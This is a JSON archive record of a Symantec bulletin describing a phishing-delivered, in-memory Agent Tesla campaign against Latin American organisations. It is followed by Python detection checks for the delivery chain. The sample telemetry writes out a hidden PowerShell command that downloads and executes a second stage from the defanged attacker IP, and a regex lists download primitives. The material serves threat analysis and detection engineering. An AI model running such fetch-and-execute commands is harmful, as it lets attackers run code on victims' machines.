{
	"id": "06755e9f-37c0-4046-bcff-b990e985a00f",
	"created_at": "2026-04-06T00:15:27.777036Z",
	"updated_at": "2026-04-10T03:21:12.009429Z",
	"deleted_at": null,
	"sha1_hash": "461bcaca1ccb315f5961c58d31f8387a10da7e81",
	"title": "Multi-Stage In-Memory Agent Tesla Campaign Targets LATAM",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 44547,
	"plain_text": "Multi-Stage In-Memory Agent Tesla Campaign Targets LATAM\r\nArchived: 2026-04-05 17:39:29 UTC\r\nSymantec has identified a new Agent Tesla campaign that uses business-themed social engineering to target organizations across Latin America, Spain, and other international sectors. The actor impersonates a company that advertises outsourced management, consulting, and facility services.\r\nThe email (Subject: “Solicito su apoyo para procesar y confirmar Orden de Compra adjunta”, i.e. “I request your support to process and confirm the attached Purchase Order”) asks the recipient to process and confirm an attached purchase order (Orden de compra_N202501023.PDF.001).\r\nThe message instructs the recipient to urgently confirm delivery dates and pricing, suggesting that failure to respond within 48 hours implies acceptance; the deadline exists to push the recipient into acting before thinking. The attachment masquerades as a PDF invoice, but the trailing .001 is a split-archive volume extension: the file is a compressed archive, not a PDF, and opening it launches the malware.\r\nAttack chain: Email \u003e RAR attachment \u003e JScript loader (.jse) \u003e PowerShell (downloaded) \u003e PowerShell (in-memory execution) \u003e .NET loader (in-memory) \u003e .NET Agent Tesla payload (in-memory)\r\nThe PowerShell downloader retrieves its second stage from hxxp://172[.]245[.]246[.]93/jojoServer_Encrypted.jpg. The .jpg extension is masquerading rather than steganography: the file served is not an image, and the extension only helps the request blend in with ordinary web traffic.\r\nOnce the downloaded stage runs, the remaining loaders execute entirely in memory to hinder detection and avoid leaving artifacts on disk. The malware uses obfuscation, masquerading, and AMSI bypass techniques to stay stealthy, then harvests credentials and system information and exfiltrates them over encrypted channels.\r\nObserved techniques include:\r\nExecution: Native API (T1106)\r\nPersistence \u0026 PrivEsc: Registry modification, system process creation or modification, process injection (T1112, T1543, T1055)\r\nDefense Evasion: Obfuscation, masquerading, AMSI bypass, encrypted C2 (T1027, T1036, T1562, T1573)\r\nCredential Access: Credential dumping, unsecured credentials, email credential harvesting (T1003, T1552, T1114)\r\nDiscovery \u0026 Collection: Process and system discovery, data harvesting from the local system (T1057, T1082, T1005)\r\nC2: HTTP(S) application-layer communications over an encrypted channel (T1071, T1573)\r\nThis campaign shows broad, opportunistic targeting across Latin America and select international regions. Primary targeting includes Mexico, Peru, Colombia, Dominican Republic, Ecuador, Costa Rica, Brazil, Chile, and Spain.\r\nImpacted sectors span:\r\nFinance \u0026 Banking / Insurance\r\nGovernment (Health, Finance, Environment)\r\nRetail / E-commerce\r\nAutomotive \u0026 Heavy Machinery\r\nEnergy / Utilities / Mining\r\nManufacturing (Paper, Packaging, Defense Components)\r\nTelecommunications, Logistics \u0026 Maritime\r\nHealthcare / Diagnostics\r\nAgriculture \u0026 Food Supply Chain\r\nNGOs and Research Organizations\r\nSymantec protects you from this threat, identified by the following:\r\nBehavior-based\r\nSONAR.Stealer!gen1\r\nCarbon Black-based\r\nAssociated malicious indicators are blocked and detected by existing policies within Carbon Black products. The recommended policy, at a minimum, is to block all types of malware from executing (Known, Suspect, and PUP) and to delay execution for cloud scan, so as to get maximum benefit from the Carbon Black Cloud reputation service.\r\nEDR-based\r\nBoth Symantec and Carbon Black EDR are capable of monitoring and flagging this threat actor's tactics, techniques and procedures.\r\nEmail-based\r\nCoverage is in place for Symantec's email security products, and Email Threat Isolation (ETI) technology provides an extra layer of protection for our customers.\r\nFile-based\r\nISB.Downloader!gen348\r\nTrojan.Gen.MBT\r\nXSNet.Js!gen2\r\nXSNet.Ps1!gen2\r\nMachine Learning-based\r\nHeur.AdvML.B\r\nWeb-based\r\nObserved domains/IPs are covered under security categories in all WebPulse enabled products\r\nSource: https://www.broadcom.com/support/security-center/protection-bulletin/multi-stage-in-memory-agent-tesla-campaign-targets-latam",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.broadcom.com/support/security-center/protection-bulletin/multi-stage-in-memory-agent-tesla-campaign-targets-latam"
	],
	"report_names": [
		"multi-stage-in-memory-agent-tesla-campaign-targets-latam"
	],
	"threat_actors": [],
	"ts_created_at": 1775434527,
	"ts_updated_at": 1775791272,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/461bcaca1ccb315f5961c58d31f8387a10da7e81.pdf",
		"text": "https://archive.orkl.eu/461bcaca1ccb315f5961c58d31f8387a10da7e81.txt",
		"img": "https://archive.orkl.eu/461bcaca1ccb315f5961c58d31f8387a10da7e81.jpg"
	}
}
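The delivery chain in the bulletin above (an archive with a .PDF.001 double extension, a .jse loader that hands off to a PowerShell downloader, and a second stage served as a .jpg that is not an image) gives a detection engineer three concrete checks. The Python below is an added example, not code from the bulletin or from Symantec. It assumes that the .jse runs under the Windows Script Host (wscript.exe or cscript.exe) and spawns powershell.exe, which the bulletin does not state; the process events, file names, command lines and byte strings are constructed for the example, and the defanged URL is the one the bulletin quotes.

```python
"""Triage checks for the Agent Tesla delivery chain above (added example).

Three checks a mail-gateway or EDR rule author would want:
  1. an attachment name that advertises a document type but ends in an
     archive or split-volume extension (the bulletin's ".PDF.001"),
  2. a downloaded body whose URL ends in an image extension but whose bytes
     are not that image type (the "jojoServer_Encrypted.jpg" second stage),
  3. a PowerShell process with a download primitive on its command line
     whose parent is a script host (the .jse loader handing off to PowerShell).
All file names, process events and byte strings below are constructed for the
example; the defanged URL is the one quoted in the bulletin.
"""
import re
from dataclasses import dataclass

DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx"}
# Archive and split-volume suffixes that commonly ride behind a fake document
# extension. Three digits (".001") is the form the bulletin's attachment uses.
ARCHIVE_SUFFIX = re.compile(r"^\.(\d{3}|rar|zip|7z|r\d\d|ace|iso|gz|img)$", re.I)


def suspicious_attachment(name: str) -> bool:
    """True for names like 'Orden de compra_N202501023.PDF.001': a document
    extension immediately followed by an archive or split-volume extension."""
    parts = name.lower().split(".")
    if len(parts) < 3:
        return False
    return parts[-2] in DOC_EXTS and ARCHIVE_SUFFIX.match("." + parts[-1]) is not None


# Magic numbers for the image types an attacker typically claims in the URL.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def fake_image(url: str, body: bytes) -> bool:
    """True when the URL path advertises an image extension but the response
    bytes do not start with that image type's magic header."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    magics = IMAGE_MAGIC.get(ext)
    if magics is None:
        return False  # not claiming to be an image, so nothing to contradict
    return not any(body.startswith(m) for m in magics)


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon EID 1 or an EDR emits)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Assumption (ours, not the bulletin's): the .jse runs under the Windows Script
# Host and spawns PowerShell; the bulletin only says the loader hands off to it.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|net\.webclient|start-bitstransfer",
    re.I,
)


def chained_powershell_downloads(events):
    """PIDs of PowerShell processes whose parent is a script host and whose
    command line carries a download primitive. Admin PowerShell launched from
    explorer.exe or a scheduler has a different parent and is not flagged."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if (
            e.image.lower() in PS_HOSTS
            and parent is not None
            and parent.image.lower() in SCRIPT_HOSTS
            and DOWNLOAD_HINTS.search(e.cmdline)
        ):
            hits.append(e.pid)
    return hits


# Constructed sample telemetry: one malicious chain and one benign PowerShell.
SAMPLE_EVENTS = [
    ProcEvent(4000, 800, "outlook.exe", "outlook.exe"),
    ProcEvent(4100, 4000, "wscript.exe",
              "wscript.exe \"C:\\Users\\user\\AppData\\Local\\Temp\\loader.jse\""),
    ProcEvent(4200, 4100, "powershell.exe",
              "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
              ".DownloadString('hxxp://172[.]245[.]246[.]93/jojoServer_Encrypted.jpg')"),
    ProcEvent(4300, 800, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    print(suspicious_attachment("Orden de compra_N202501023.PDF.001"))       # True
    print(fake_image("http://example.test/jojoServer_Encrypted.jpg", b"MZ"))   # True
    print(chained_powershell_downloads(SAMPLE_EVENTS))                           # [4200]
```

The first check belongs at the mail gateway, where the attachment name is visible before the archive is ever opened; the second runs on a proxy or sandbox that sees the response body, and is deliberately narrow (a URL with no image extension is not flagged, since the claim it contradicts is the extension itself); the third is the EDR correlation, keyed on parent process rather than on the IP, so it keeps working when the actor rotates hosting.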